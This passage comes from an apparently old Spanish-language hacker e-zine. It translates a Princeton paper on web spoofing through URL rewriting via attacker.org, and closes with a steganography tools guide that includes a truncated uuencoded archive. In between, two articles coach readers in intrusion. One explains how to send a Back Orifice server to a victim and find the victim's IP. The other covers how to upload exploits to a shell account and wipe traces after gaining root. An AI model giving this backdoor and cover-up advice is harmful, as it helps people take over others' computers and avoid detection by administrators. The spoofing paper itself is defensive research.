significa que el atacante puede observar cualquier numero de cuenta o passwords que la victima meta. Como veremos abajo, el atacante puede llevar a cabo la vigilancia incluso si la victima tiene una conexion "segura" (normalmente por medio de Secure Sockets Layer) al servidor, esto es, incluso si el navegador de la victima muestra el icono de conexion segura (normalmente una imagen de un candado o una llave). Amaño: El atacante es tambien libre de modificar cualquiera de los datos que viajen en cualquiera de las direcciones entre la victima y el Web. El atacante puede modificar datos del formulario enviado por la victima. Por ejemplo, si la victima esta pidiendo un producto on-line, el atacante puede cambiar el numero del producto, la cantidad, o la direccion a que debe ser enviado. El atacante puede tambien modificar los datos devueltos por un servidor Web, por ejemplo insertando material engañoso u ofensivo para engañar a la victima o para crear hostilidad entre la victima y el servidor. Spoofing de toda la Red ----------------------- Puedes pensar que es muy dificil para el atacante el trucar toda la World Wide Web, pero no lo es. El atacante no necesita guardar todo el contenido de la Red. Toda la Web esta disponible on-line; el servidor del atacante puede simplemente traer una pagina de la Web real cuando necesita proporcionar una copia de la pagina a la Web falsa. Como Funciona el Ataque ----------------------- La clave de este ataque es que el servidor Web del atacante se siente entre la victima y el resto de la Red. Este tipo de procedimiento se llama "ataque de hombre en medio" en la literatura de seguridad. Renombramiento de URL --------------------- El primer truco del atacante consiste en reescribir todas las URLs de alguna pagina Web de manera que apunten al servidor del atacante en vez de hacia aquellos servidores reales. Asumiendo que el servidor del atacante este en la maquina www.attacker.org, el atacante reescribe una URL añadiendo http://www.attacker.org delante de la URL. Por ejemplo, http://home.netscape.com se convierte en: http://www.attacker.org/http://home.netscape.com (La tecnica de renombramiento de URL ha sido usada para otras razones por otros dos Web sites, the Anonymizer y the Zippy filter. Mira la ultima pagina para detalles.) La ilustracion 1 muestra lo que ocurre cuando la victima pide una pagina a traves de una de las URLs renombradas. El navegador de la victima pide la pagina desde www.attacker.org , ya que la URL comienza con http:// www.attacker.org. La notificacion de la URL le dice al servidor del atacante a que lugar de la Red ir para coger el documento verdadero. Una vez que el servidor del atacante ha pillado el documento real necesario para satisfacer el pedido, el atacante reescribe todas las URLs del documento del mismo modo especial empalmando http://www.atacker.org/ delante. Entonces el server del atacante le da la pagina reescrita al navegador de la victima. Ya que todas las URLs de la pagina reescrita apuntan ahora a www.attacker.org , si la victima sigue un link de la nueva pagina, la pagina sera de nuevo pillada a traves del servidor del atacante. La victima continua atrapada en la Web falsa del atacante, y puede seguir links por siempre sin abandonarla. Formularios ----------- Si la victima rellena un formulario de una pagina de la Web falsa, el resultado parece que haber sido bien manejado. El spoofing de formularios funciona naturalmente ya que los formularios estan estrechamente integrados en los protocolos de Web basicos: los envios de formularios estan codificados en URLs y las respuestas son HTML ordinario. Ya que cualquier URL puede ser "spoofeada", los formularios tambien. Cuando la victima envia un formulario, los datos enviados van al servidor del atacante. El servidor del atacante puede observar e incluso modificar los datos enviados, haciendo cualquier edicion maligna que se desee, antes de pasarlo al servidor real. El servidor del atacante puede tambien modificar los datos que vuelven como respuesta a el formulario enviado. Las conexiones "Seguras" no ayudan ---------------------------------- Una angustiosa propiedad de este ataque es que funciona incluso cuando la victima pide una pagina por medio de una conexion "segura". Si la victima hace un acceso de Web "seguro" (un acceso Web usando el Secure Sockets Layer) en una Web falsa, todo parecera normal: la pagina sera mostrada, y el indicador de conexion segura (normalmente una imagen de una candado o llave) se encendera. El navegador de la victima reporta que tiene una conexion segura por que la tiene. Desafortunadamente la conexion segura es a www.attacker.org y no al sitio que la victima piensa. El navegador de la victima piensa que todo va bien: se le dijo que accediese a una URL en www.attacker.org asi que hizo una conexion segura a www.attacker.org. El indicador de conexion segura solo da una sensacion falsa de seguridad a la victima. Comenzando el Ataque -------------------- Para empezar un ataque, el atacante debe de algun modo atraer a la victima a la Web falsa del atacante. Hay varios modos de hacer esto. Un atacante podria poner un link a una Web falsa en una pagina Web popular. Si la victima tiene el mail del navegador activado, el atacante puede mandar un mail a la victima con un indicador a la Web falsa, o incluso los contenidos de una pagina en una Web falsa. Finalmente, el atacante puede engañar a un motor de busqueda Web para que indexe parte de la Web falsa. Completando la Ilusion ---------------------- El ataque como se ha descrito hasta aqui es bastante facil, pero no es perfecto. Hay todavia algun contexto permanente que puede dar a la victima pistas de que el ataque se esta llevando a cabo. Sin embargo, es posible para el atacante el eliminar practicamente todas las pistas restantes de la existencia del ataque. Dicha evidencia no es muy dificil de eliminar por que los navegadores son muy manejables. La habilidad de una pagina Web para controlar el comportamiento de un navegador es a menudo deseable, pero cuando la pagina es hostil puede ser peligroso. La Barra de Estado ------------------ La barra de estado es una sola linea de texto situada debajo de la ventana del navegador que muestra varios mensajes, normalmente sobre el estado de transferencias Web pendientes. El ataque como se ha descrito hasta aqui, deja dos tipos de evidencia en la barra de estado. El primero, cuando el raton se situa sobre un link, la barra de estado muestra la URL a la que el link apunta. Asi, la victima podria darse cuenta de que una URL ha sido reescrita. Segundo, cuando una pagina se esta cargando, la barra de estado muestra brevemente el nombre del servidor que se esta contactando. Asi, la victima podria notar que se esta mostrando www.attacker.org cuando en realidad se esperaba otro nombre. El atacante puede cubrir ambas indicaciones añadiendo un programa JavaScript a cada una de las paginas reescritas. Ya que los programas JavaScript pueden escribir en la barra de estado, y ya que es posible vincular acciones JavaScript a los eventos relevantes, el atacante puede arreglar las cosas de modo que la barra de estado participe en la estafa, mostrando siempre a la victima lo que debia haber aparecido en la barra de estado en la Web real. Asi el falseado contexto se hace incluso mas convincente. La Linea de Localizacion ------------------------ La linea de localizacion del navegador muestra la URL de la pagina que esta mostrando en ese momento. La victima puede tambier teclear la URL en la linea de localizacion, enviando al navegador a esa URL. El ataque como se ha descrito hasta aqui hace aparecer una URL reescrita en la linea de localizacion, dando a la victima una posible indicacion de que se esta cometiendo un ataque. Esta pista puede ser ocultada usando JavaScript. Un programa JavaScript puede ocultar la linea de localizacion real y reemplazarla por una linea de localizacion falsa que parece correcta y se encuentra en el lugar esperado. La linea de localizacion falsa puede mostrar la URL que la victima espera ver. La linea de localizacion falsa puede tambien aceptar entradas de teclado, permitiendo a la victima teclear URLs normalmente. Las URLs tecleadas pueden ser reescritas por el programa JavaScript antes de que se acedan a ellas. Viendo el Codigo Fuente del Documento ------------------------------------- Hay una pista que el atacante no puede eliminar, pero es poco probable que sea notada. Usando la opcion de "ver codigo" del navegador, la victima puede mirar el codigo HTML de la pagina actualmente mostrada. Buscando URLs reescritas en el codigo HTML, la victima puede detectar el ataque. Desafortunadamente, el codigo HTML es dificil de leer para usuarios novatos, y muy pocos navegantes se molestan en mirar el codigo HTML de los documentos que estan visitando, asi que esto provee muy poca proteccion. Una pista parecida esta disponible si la victima elige la opcion "ver informacion del documento" del navegador. Esto mostrara informacion incluyendo la URL real del documento, permitiendo posiblemente a la victima darse cuenta del ataque. Como arriba, esta opcion no se usa casi nunca asi que es muy poco probable que proporcione mucha proteccion. Bookmarks --------- Hay varias formas de que la victima pueda dejar accidentalmente la Web falsa del atacante durante el ataque. Accediendo a las bookmarks o saltando a una URL usando la opcion "Abrir localizacion" del navegador podria llevar a la victima de vuelta a la Web real. La victima podria entonces volver a entrar a la Web falsa pulsando el boton "Back". Podemos imaginar que la victima podria ir entrando y saliendo de una o mas Webs falsas. Por supuesto, las bookmarks pueden tambien funcionar contra la victima, ya que es posible el añadir un bookmark de una pagina de la Web falsa. El saltar a dicha bookmark llevaria a la victima de vuelta a la Web falsa. Traceando al Atacante --------------------- Algunas personas han sugerido que este ataque puede ser disuadido encontrando y castigando al atacante. Es cierto que el servidor del atacante debe revelar su localizacion de modo que pueda llevar a cabo el ataque, y la evidencia de esa localizacion estara disponible practicamente seguro despues de que se detecte un ataque. Desafortunadamente, esto no ayudara mucho en la practica ya que los atacantes irrumpiran en la maquina de alguna persona inocente y lanzaran el ataque alli. Se usaran maquinas robadas en estos ataques por la misma razon que la mayoria de los ladrones de banco realizan sus huidas en coches robados. Remedios -------- El Web spoofing es un ataque de seguridad peligroso y practicamente indetectable que se puede llevar a cabo en la Internet de hoy en dia. Afortunadamente hay algunas medidas de proteccion que puedes tomar. Solucion a Corto-plazo ---------------------- A corto plazo, la mejor defensa es el seguir una estrategia de tres partes: 1. deshabilita la opcion de JavaScript en tu navegador de modo que el atacante no podra ocultar la evidencia del ataque; 2. asegurate de que la linea de localizacion de tu navegador este siempre visible; 3. presta atencion a las URLs mostradas en la linea de localizacion de tu navegador, asegurandote de que siempre apunten al servidor al que piensas que estas conectado. Esta estrategia disminuira significativamente el riesgo de ataque, aunque podrias aun ser victima si no eres consciente de mirar la linea de localizacion. Actualmente, JavaScript, ActiveX y Java tienden a facilitar el spoofing y otros ataques de seguridad, asi que recomendamos que los deshabiliteis. Haciendolo causara que pierdas cierta funcionalidad, pero puedes compensar mucha de esta perdida habilitando selectivamente estas caracteristicas cuando visites un site de confianza que los requiera. Solucion a Largo-plazo ---------------------- No conocemos una solucion a largo-plazo totalmente satisfactoria para este problema. El cambiar los navegadores de modo que muestren siempre la linea de localizacion ayudaria, aunque los usuarios aun tendrian que estar atentos y saber como reconocer URLs reescritas. Para las paginas que no son traidas via conexion segura, no hay mucho mas que se pueda hacer. Para las paginas traidas via conexion segura, un indicador de conexion- segura mejorado podria ayudar. En vez de indicar simplemente una conexion segura, los navegadores deberian decir claramente quien esta al otro lado de la conexion. Esta informacion deberia ser mostrada con un lenguaje claro, de forma entendible para los usuarios novatos; deberia decir algo como "Microsoft Inc." en vez de "www.microsoft.com". Todo acercamiento a este problema parece depender de la vigilancia de los usuarios de Web. Aunque podamos realmente esperar que todo el mundo este atento es siempre discutible. Trabajos Relacionados --------------------- Nosotros no inventamos la tecnica de reescritura de URL. Previamente, la reescritura de URL ha sido usada como una tecnica para proporcionar servicios utiles a gente que los ha pedido. Sabemos de la existencia de dos servicios que usan la reescritura de URL. El Anonymizer, escrito por Justin Boyan en Carnegie Mellon University, es un servicio que permite a los usuarios el navegar por la Red sin revelar sus identidades a los sites que visitan. The Zippy filter, escrito por Henry Minsky, presenta una vision divertida de la Red con dichos de Zippy- the-Pinhead insertados aleatoriamente. Aunque nosotros no inventamos la reescritura de URL, creemos que somos los primeros en darnos cuenta de su total potencial como un componete de un ataque de seguridad. Agradecimientos --------------- La parte de reescritura de URL de nuestro programa de demostracion esta basada en el codigo de Henry Minsky para el Zippy filter. Agradecemos a David Hopwood sus utiles comentarios sobre ataques spoofing, y a Gary McGraw y Laura Felten sus comentarios sobre el borrador de este documento. Para Mas Informacion -------------------- Mas informacion disponible en nuestra pagina web en: http://www.cs.princeton.edu/sip , o del Profesor Edward Felten en felten@cs.princeton.edu o en el (609) 258-5906 Referencias ----------- [1] Peter G. Neumann. Computer-Related Risks. ACM Press, New York, 1995. [2] Gary McGraw and Edward W. Felten. Java Security: Hostile Applets, Holes and Antidotes. John Wiley and Sons, New York, 1996. [3] Robert T. Morris. A Weakness in the 4.2BSD UNIX TCP/IP Software. Computing Science Technical Report 117, AT&T Bell Laboratories, February 1985. [4] Steven M. Bellovin. Security Problems in the TCP/IP Protocol Suite. Computer Communications Review 19(2):32-48, April 1989. [5] Steven M. Bellovin. Using the Domain Name System for System Break-ins. Proceedings of Fifth Usenix UNIX Security Symposium, June 1995. [6] Web site at http://www.anonymizer.com [7] Web site at http://www.metahtml.com/apps/zippy/welcome.html Traduccion ---------- Traducido por [Tosh] BBK "Big Bro Killerz" bigbrokill@hotmail.com http://www.geocities.com/SiliconValley/Pines/7347/ -|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| ╔──────────────────────────────────────╗ │ │ │ PELIGRO EN WINDOWS │ │ Original de Yo Soy para RareGaZz │ │ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- │ ╚──────────────────────────────────────╝ Al parecer el uso de ciertas utilidades para tener acceso sobre plataformas windows, estan creciendo, tan solo unos ejemplos son: el hacer Spoofing a usuarios de ICQ o conectarse remotamente con aplicaciones que actuan como "backdoors" permitiendo asi la entrada a personas desconocidas al sistema. Un ejemplo de estas "backdoors" es el famoso programa - Back Orifice - , este ultimo del grupo cDc (Cult of Dead Cow). El usuario fisico ejecuta el programa que funciona como "servidor" para el programa "cliente". La persona que tiene el programa cliente tiene dominio sobre el sistema, pudiendo hacer por ejemplo: Ejecutar aplicaciones, abrir un puerto para entrar via http, subir y bajar archivos, asi como eliminalos y modicarlos, ver lo que escribe el usuario en la pc remota, ver su pantalla, abrir la unidad de cd-rom, solo por decir algunas cuantas... De echo, la persona que ejecuta el programa "servidor", ni cuenta se da de que ha dejado su sistema a merced del "intruso"; quien, si es malicioso intentara joder el sistema de alguna manera. El programa se auto-copia a otra locacion dentro del mismo disco duro , modifica el registro del sistema de manera que cada vez que se inicie windows se auto-ejecute, impidiendo asi que el usuario lo note facilmente. TU MISMO puedes estar bajo estas influencias ahora mismo y ni siquiera lo sabes.... Las posibilidades son infinitas ( te imaginas mandar el backdoor a un admin que utilice NT, jaja, tendremos control sobre las cuentas y todo el sistema). Microsoft fue notificado, podemos ver unos cuantos bytes sobre el tema en: http://www.microsoft.com/security/bulletins/ms98-010.htm E ISS's no se queda atras: http://www.iss.net/xforce/alerts/advise5.html __ UTILIZANDO LAS BACKDOORS... Pues esto esta muy facil, tienen que empaquetar el programa "server" del programa en cuestion (patch.exe o boserver.exe ) y enviarlo a la "victima" quien lo ejecutara y asi te podras conectar tu... (no tiene mucho chiste...) Por cierto el BO hay una version para Unix/Linux. - Desventajas: __ Ya lo hice, pero como me conecto si no tengo su IP ? Pues la principal desventaja es que tienes que investigar la ip del usuario victima para poder hacer la conexion, esto no es muy dificil si estamos via IRC con el comando /dns nick_victima y con ICQ utilizando la opcion info, o si esta escondida, utilizando el ICQ Spoofer ;) [Disponible ya en la web de RareGaZz] __ Ya lo hice, pero no tiene ICQ y no esta via irc... En caso de que se trate de algun Admin de un server, pues prueba con su dominio y en la mayoria de los casos funciona. __ Nope, se trata de un amigo al que le quiero jugar una broma.. Ups!, si se trata de un usuario con I.P dinamica, pues ya valiste.. Tendras que ingeniartelas para obtener su I.P...(de esta forma no estas de lamercillo destruyendo sistemas..) __ Oh! Diablos!! Ejecute boserve.exe en mi maquina!!!.. Jajaja!!! que cosa :P, bueno no todo esta acabado, existe un programa llamado B.O.R.E.D. (Back Orifice Recognition, Extraction and Deletion) que se encarga de protegerte del uso de Back Orifice (huy... que miedo :) [ Proximamente en la web de RareGaZz ] <-> Saludos a: #RaZa-MeXiCaNa Red Latina, dR-SeuSs, Megaflop, xDAWN, GuyBrush, Acidgum, He|io, PlaXiuS, SufferBoy, y los demas... :) <=Yo-Soy=> varf@bigfoot.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ╔──────────────────────────────────────╗ │ │ │ INTRODUCIENDO TUS EXPLOITS │ │ por Yo Soy (varf@bigfoot.com) │ │ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- │ ╚──────────────────────────────────────╝ Digamos que tienes una cuenta en un sistema y que vas a hacer unas cuantas cosas divertidas ;) ... Bueno , conseguimos unos exploits en nuestro lugar preferido ( Bugtraq, Rootshell o RareGaZz :D , etc ) y Ohh que diablos ! Como los introduzco ? Bueno, aqui podemos hacer varias cosas: a) Usar el FTP para subirlos al home de la cuenta (algo sospechoso) b) Mandarlos via e-mail (menos sospechoso) c) Escribirlos directamente en la shell (menos sospechoso y mas tardado) A) FTP Muy simple, utilizando el comando ftp o con un cliente ftp nos conectamos al host que queremos, subimos los archivos y ya.. ( no es muy recomendable, pues deja logs, si el admin se pone a ver se dara cuenta que un hacker le andaba por ahi, sobre todo si tus exploits fallan... ) B) E-MAIL Esta forma seria menos sospechosa, pues los usuarios utilizan el correo en forma normal y no se notaria el asunto de nuestros programillas, seria casi indetectable, pero puede tener el inconveniente de ser tardado, dependiendo de la distancia entre tu y el host... C) ESCRIBIENDOLOS Aqui utilizariamos un editor y estariamos como weyes escribiendo letra por letra todo el fucking exploit, pero hay una forma mas facil que es utilizando el comando cat e ir pegando el exploit a la terminal. Ejemplo: varf:~:$ cat > mundo.c << STOP #include <stdio.h> main() { printf("Hola mundo! :P\n"): } STOP varf:~:$ varf:~:$ cat mundo.c main() { printf("Hola mundo! :P\n"): } varf:~:$ varf:~:$ cc -o mundo mundo.c varf:~:$ mundo Hola mundo! :P varf:~:$ Aqui utilizamos "cat > nombre.c << STOP" para meter los archivos desde la terminal, pudiendo cortar el contenido desde otro editor y despues pegarlo en la terminal, despues cuando escribimos STOP se detiene la forma de introducir infromacion y se salva el archivo. Despues usamos cat de nuevo para ver como quedo el archivo, y vemos que la palabra STOP no se quedo en el contenido del archivo, despues compilamos con cc y ya... facil :) Recuerda siempre borrar los exploits (funcionen o no), y si consigues root eliminar las pocas huellas que hay para que el admin no se ponga sospechoso... Disfruten... <=> Original en CRH #2 ╔════════════════════════════════════════════════════════════════════════════╗ ║╔══════════════════════════════════════════════════════════════════════════╗║ ║║╔════════════════════════════════════════════════════════════════════════╗║║ ║║║ ESTEGANOGRAFIA O EL ARTE DE ESCONDER LOS DATOS ║║║ ║║║ por PaTa ║║║ ║║╚════════════════════════════════════════════════════════════════════════╝║║ ║╚══════════════════════════════════════════════════════════════════════════╝║ ╚════════════════════════════════════════════════════════════════════════════╝ ¿Que es la esteganografia? te preguntaras, bueno pues es un conjunto de tecnicas que nos permiten ocultar cualquier tipo de datos. La diferencia entre esteganogarfia y criptografia, es muy simple mientras que la criptografia modifica los datos para que no sean legibles, de todos es sabido la forma de trabajar del pgp, la esteganografia simplemente los oculta, aunque hoy en dia ambas tecnicas son facilmente compatibles con el uso de los ordenadores actuales. Esta tecnica no es nada nueva, data de bastante tiempo, por ejemplo en la segunda guerra mundial los aliados usaban esta tecnica para comunicarse con la resistencia alemana por medio de cartas. La innovacion en esta tecnica se ha dado gracias a la llegada de la informatica y los ordenadores, se ha pasado de por ejemplo escribir con tinta invisible que solo se ve al acercar una fuente de calor, cosa que todos hemos visto en las peliculas de espias, a modificar archivos de audio o graficos para que estos contengan a su vez otros archivos. La esteganografia nos puede servir para comunicarnos sin que la gente se de cuenta ya que por ejemplo si usas el pgp la gente piensas que ocultas algo, cosa que a mi me sucede yo tengo un amigo, al que le digo que use el pgp para comunicarse conmigo y el me dice que no tiene nada ilegal que decirme, espero que al leer esto cambies de idea :o) bueno como dice Phil Zimmerman autor del pgp "Si se convierte la privacidad en algo ilegal, solo los ilegales tendran privacidad". El medio ideal para usar la estaganografia es aquel en donde se suelen realizar escaneos automatizados de mensajes, o donde puede ser sospechoso usar otros medio de encriptacion criptografica, por ejemplo si en el trabajo usas continuamente pgp pueden que alli alguien se empice a mosquear, o si la paranolla invade tu vida :o) para esos momentos nada mejor que la esteganografia. Aunque claro segun donde estemos no podemos dar un salto radical a la esteganografia, si estamos trabajando, y usamos continuamente pgp, y cambiamos de la noche al dia a la esteganografia, podemos levantar sospechas, para eso es mejor una preparacion del entorno, en ese caso deberiamos empezar a interesarnos por las matematicas del caos y fractales, y despues de un tiempo empezar a intercambiar fractales con nuestro anterior comunicante del pgp. Por lo que todo el mundo debe tener precauciones en sus mensajes por mail si no ya se esta viendo lo que le esta pasando a Bill Gates, y sus mail a sus subordinados, en el juicio anti-monopolio en E.E.U.U. El correo electronico poco a poco va sustituyendo al normal, en todos los aspectos pues de todos es conocida su aplastante superioridad sera la norma para todo el mundo, no la novedad que es hoy en dia. Los gobiernos no solo el norteamericano tambien recientemente el español con su articulo 52 pretenden proteger nuestro correo electronico con sistemas de encriptacion diseñados por ellos. Probablemente la mayor parte de la gente aceptara eso. Pero quizas algunos prefiraos utilizar otras medidas propias, si o recordemos el DES vencido en tres horas y con un ordenador de tan solo cuarenta millones de pesetas. Las agencias de inteligencia tienen acceso a buenos sistemas de criptografia, tambien los grandes traficantes de armas y drogas. Igualmente los fabricantes, las multinacionales y otros gigantes corporativos. Pero la gente normal y corriente, las organizaciones de andar por casa, no tienen acceso a tecnologia ,pero se puede resolver con otro tipo de tecnicas, como la esteganografia. Ahora voy a poner algunos programas y su uso mas basico: ╔═════════════════════════════════════════════════════════════╗ ║ TEXTO ║ ╚═════════════════════════════════════════════════════════════╝ Texto, que a pesar de su nombre no es un programa español, ha sido escrito por Kevin Maher, y es un programa que transforma archivos codificados con uuencode o archivos encriptados con PGP con ASCII armor en archivos de texto que contienen frases en ingles. Los textos producidos por Texto son, ante todo, extraños. Los aficionados al surrealismo disfrutaran con este programa. Aqui teneis un pequeño ejemplo: The printer weakly leans to the cold planet. I outwit bright units near the new cosmetic barn. Sometimes, hats count behind cold windows, unless they're cosmetic. Never count strangely while you're riping through a cold car. We easily love around secret clear monoliths. While pins really learn, the cats often eat on the ajar hens. Other usable strange games will darken fully with forks. Going below a corner with a brush is often tall. Have a filthy pool. The cosmetic floor rarely dreams. Tell the clear book it's fully tooting against a dust. Many clear powerful eggs will smile slowly to pools. To be dense or dense will cause sly pins to float. Will you question the quiet cold codes? Let's connect near the obtuse cafes, but don't write the filthy papers. Texto sustituye los caracteres ASCII por palabras en ingles que obtiene de un archivo llamado words. Despues utiliza estas palabras segun las estructuras de frases contenidas en un archivo llamado structs, creando asi el texto en ingles. El gran problema que tiene este programa: el texto obtenido es DIEZ VECES mayor que el archivo original. Otros dos inconvenientes, de mucho menor importancia tienen que ver con el uso de archivos codificados con uuencode: el primero es que se pierde la informacion sobre el nombre y el modo de acceso del archivo original; el segundo es que el texto producido puede llegar a ser demasiado repetitivo. Ejemplos texto archivo_encriptado > archivo_de_texto Transforma el contenido de archivo_encriptado (un archivo PGP con ASCII armor o un archivo codificado con uuencode) en texto en ingles. texto -p archivo_de_texto > archivo_PGP Convierte el texto en ingles de archivo_de_texto en un archivo PGP con ASCII armor. texto -u archivo_de_texto > archivo_uuencode Lo mismo que el anterior ejemplo, pero con uuencode. ╔═════════════════════════════════════════════════════════════╗ ║ MANDELSTEG ║ ╚═════════════════════════════════════════════════════════════╝ El programa Mandelsteg ha sido escrito por Henry Hastur y puede distribuirse gratuitamente. Esta en realidad formado por dos programas: mandelsteg, que genera archivos gif de fractales de Mandelbrot en los que guarda los datos que se pasan como entrada segun las opciones que indiquemos en linea de comandos, gifextract, que toma las imagenes generadas por mandelsteg y extrae los datos. Mandelsteg tiene diversas opciones que utilizaremos dependiendo del nivel de seguridad deseado. Si simplemente ejecutamos mandelsteg sin opciones, el programa generara un gif de 640x480 de la seccion del conjunto por defecto de un fractal de Mandelbrot. Con la opcion -c, calculara cuantos bytes pueden almacenarse en la imagen, y con -e tomara los datos de la entrada y los almacenara en la imagen. Podemos especificar un nombre de archivo despues de -e para el archivo gif. Con -r, generara bytes aleatorios que colocara en la imagen, de forma que podremos generar imagenes sin datos verdaderos para crear confusion. Con el nivel de seguridad minimo que proporciona la opcion -e, los datos seran guardados en el bit 7 de cada pixel y se generara una paleta de 128 colores de tal forma que los pixels tengan el mismo aspecto, contengan o no da tos. Esto es suficiente para burlar vigilancias inexpertas, pero alguien que conozca estas tecnicas podra descubrir facilmente que la imagen contiene datos. Por ejemplo, sustituyendo la paleta por otra, se distinguiran claramente los datos ocultos en areas de la imagen donde hay colores solidos. Esto se puede evitar con la opcion -ns, que hara que se almacenen datos solo en areas donde no haya colores solidos. Eso si, esta opcion reduce drasticamente el numero de datos que puede almacenar la imagen, asi que antes de utilizarla "directamente", conviene hacer primero una prueba con la opcion -c. Ejemplos mandelsteg -e fractal.gif < archivo.txt Genera un fractal que almacena en fractal.gif, imagen de 640x480, e introduce los datos de archivo.txt. mandelsteg -sz 400 400 -md -0.5505 -0.5505 0.0001 0.0001 -e fractal.gif < archivo.txt Crea un fractal utilizando coordenadas distintas de las empleadas por defecto, lo almacena en una imagen de 400x400 e introduce los datos de archivo.txt. mandelsteg -ns -sz 320 240 -c > /dev/null Muestra por pantalla la cantidad de informacion que puede almacenar en una imagen de las caracteristicas indicadas. mandelsteg -fp -r -ns -e falso.gif < /dev/null Crea un fractal que almacena en falso.gif y que contiene datos aleatorios (util para despistar o hacer perder tiempo). Por cierto, salvo que se tenga un Pentium potente, hay que ser pacientes con este programa. El calculo de fractales supone muchas operaciones en coma flotante... ╔═════════════════════════════════════════════════════════════╗ ║ GIFEXTRACT ║ ╚═════════════════════════════════════════════════════════════╝ Gifextract simplemente toma como entrada una imagen y extrae los datos que contiene por defecto, los extraera del bit 7, asi que si almacenamos los datos en algun bit distinto, habra que indicarselo con la opcion -b. Tambien si usamos la opcion -ns o -bp al generar la imagen con mandelsteg, habra que utilizarlas con gifextract para extraer los datos correctamente. Ejemplos gifextract -b 4 < imagen.gif > datos.txt Extrae los datos almacenados en el bit 4 de los pixels de imagen.gif y los guarda en datos.txt Cuestiones de seguridad La pregunta es: ¿es seguro el uso de Mandelsteg? Pues la realidad es que no (pero... ¡esperad, leed primero las razones y despues encontrareis la solucion!). Las razones: Los parametros de encriptacion si se saben de puede reproducir igualmente por lo que no conviene usar dos veces las mismas coordenadas, ademas estar cambiando continuamente es un poco engorroso porque al otro le tienes que decir las coordenadas usando un medio de comunicacion seguro. ╔═════════════════════════════════════════════════════════════╗ ║ S-TOOLS ║ ╚═════════════════════════════════════════════════════════════╝ S-Tools, escrito por Andrew Brown, es un programa para Windows que permite encriptar y ocultar datos en archivos .wav o en imagenes en formato .bmp o .gif. Este programa es freeware, asi que puede distribuirse libremente, si bien hay que tener en cuenta que, dado que incluye la implementacion de diversos algoritmos criptograficos, por lo que puede estar sujeto a restricciones en algunos paises. Es un buen programa con un nivel de seguridad aceptable, ideal para windows. En cuanto a los algoritmos criptograficos, se dispone de cuatro algoritmos de clave unica: IDEA, DES, Triple DES y MDC. MANEJO El manejo es muy simple, y se realiza en combinacion con el Explorador de Windows 95 o arrastrando los ficheros. Seleccionamos en el Explorador el archivo wav o de imagen en el que queremos ocultar los datos y lo arrastramos a la ventana de S-Tools. S-Tools abrira el archivo y lo mostrara en una ventana, indicando ademas el numero de bytes que puede ocultar como maximo. A continuacion, seleccionamos en el Explorador el archivo a ocultar y lo arrastramos a la ventana del archivo "matriz" que esta en la ventana de S-Tools. Si tenemos activada la opcion de compresion, se comprimira el archivo de datos, y despues S-Tools mostrara un dialogo en el que nos pide la password para la encriptacion y nos da a elegir el algoritmo criptografico a utilizar. En caso de que el archivo "matriz" sea una imagen, aparecera otro dialogo con diversas opciones referentes a como ha de manipular S-Tools los colores de la imagen. Una vez hecho esto, comienza el proceso esteganografico, cuyo progreso podemos seguir en la ventana Actions de S-Tools. Una vez terminado, podamos grabar el archivo, haciendo click con el boton derecho del raton sobre la ventana del archivo y elegiendo la opcion "Save" o "Save as..." del menu contextual. Para extraer los datos, bastara con arrastrar el archivo a la ventana de S-Tools. Una vez lo haya abierto, pulsamos el boton derecho del raton sobre la ventana del archivo y seleccionamos la opcion "Reveal". S-Tools nos pedira la password y el algoritmo criptografico empleados al ocultar los datos, y si la password es correcta, extraera los datos. Nota: Los ejemplos se han escrito con la sintaxis de los sistemas Unix (Linux, HP-UX, System V...), excepto el de S-Tools. Aqui pongo los fuentes de algunos programas para que vayais probando el resto los podreis encontrar en la web de raregazz, aqui estan uucodificados Nota: Documento basado en el original de Jose Luis Martin Mas. >>>> TEXTO <<<< begin 644 Texto.tar.gz M'XL(``:14R\``^Q<^W/;1I+>7SE_Q81>6Y1"TJ1>2:PH646F'=WZ59:5[)6M M4D!P2&(%`@@&$,4DWK_]ONZ9`<"')"9USEVJQ'4D`ICIZ>GGUSW0OO0NU3`( MU=\^X:?3Z>SO[TK\WNYN[]-O?-LUO_'I=K>[LK/WQ?;N_A<[^SOXWNWN[NS\ M378^)5/ND^O,2\'*Q!NK]-9QMS[^JWZ.C^6A'/F^%.*!/(O\>#)142:S<:!E M'$E/ZCCT4EQ,/'\<1*HIXU1ZT4S&&>3E[LIID(UEGBL0&"A0RL9>)B$RC6]* MZL3SE?3'7NKY&68%D<Z4-Y#QD!__5'DD'A`C3WO/3E[U3L%:Z^G9V<7IFZ/C MGA!>&#ZI9>HZBX70H^")J/V]\?+HG[U-B2?R^/BPCGVT?/\RK0L1!E%^_40N MC\%F\9C)/*E-O"!JQV`HR"ZF<3K0N(C'63NF><?'F_+O#<O+IFS%DF?)FR<) M\\C2]<WX]G@5,=^0\86HTGE2JUS=,;\Z4@AFX$F-?OG\\X99/$`(/U1>!`FF M$]D:2C].E=W<%C8CQ"#0646^//I`PE.D?S6T;-'5UH$<_1(DY1UQK_^_E/[? M]HZ>ONQ]VAAS>_SO[NUM[[GXO_?%7@?QO[/_Q>Y]_/\S/JTU/D)*^:[WKW>O M94N^@T5*>._(B^)1ZB7CF5B+!--@[T$N\62:#P)*-%XZ8R.?)RF3E+Y-Y'0< M^&.9I5ZDAW$ZT<*EF`&EH6242$_[0=#RTDF<I[C+EW+@91[<`XOUHE$8Z+'4 M6`LSE6X;3BB]%8MX6D[3(,,`B2E#SP_"(/,RQ<%)72,X12-%P:H?1,2P(/I- MJ72B_`!A929!.ITE&1B@1VTI?\0F`FW2:*2PKL;$;Z5\H^(D!*U4V-4IL<YD M7\D4`3&(1G*&C5!H"$'E+68B&:LK_-38$#-T=HIP'8U2T.2YXB)5/^=!JB[D M"3:91BJ3IRJ]"A!RWZ3Q53!0J::-36($C)BB+[(\+46K()>#:85Y$\KC8CI6 MG-@Q+HHS&62TC7K<U^!$U>EV&%PAK.<)D4R\-`O\'`B!OL;``EZ(=5+\%/"K M:.!1=)+R%&NR.&?2]Z(-J!N_>#?82L:[@WAQJQ3DA&0V`MX0Q"&DU??ZD/0@ MINEC[PKD8$&\+R_*60MA'%]*Y!T%4")+2RDIZ1P/%&T;&@^0#PJRH]C8"['4 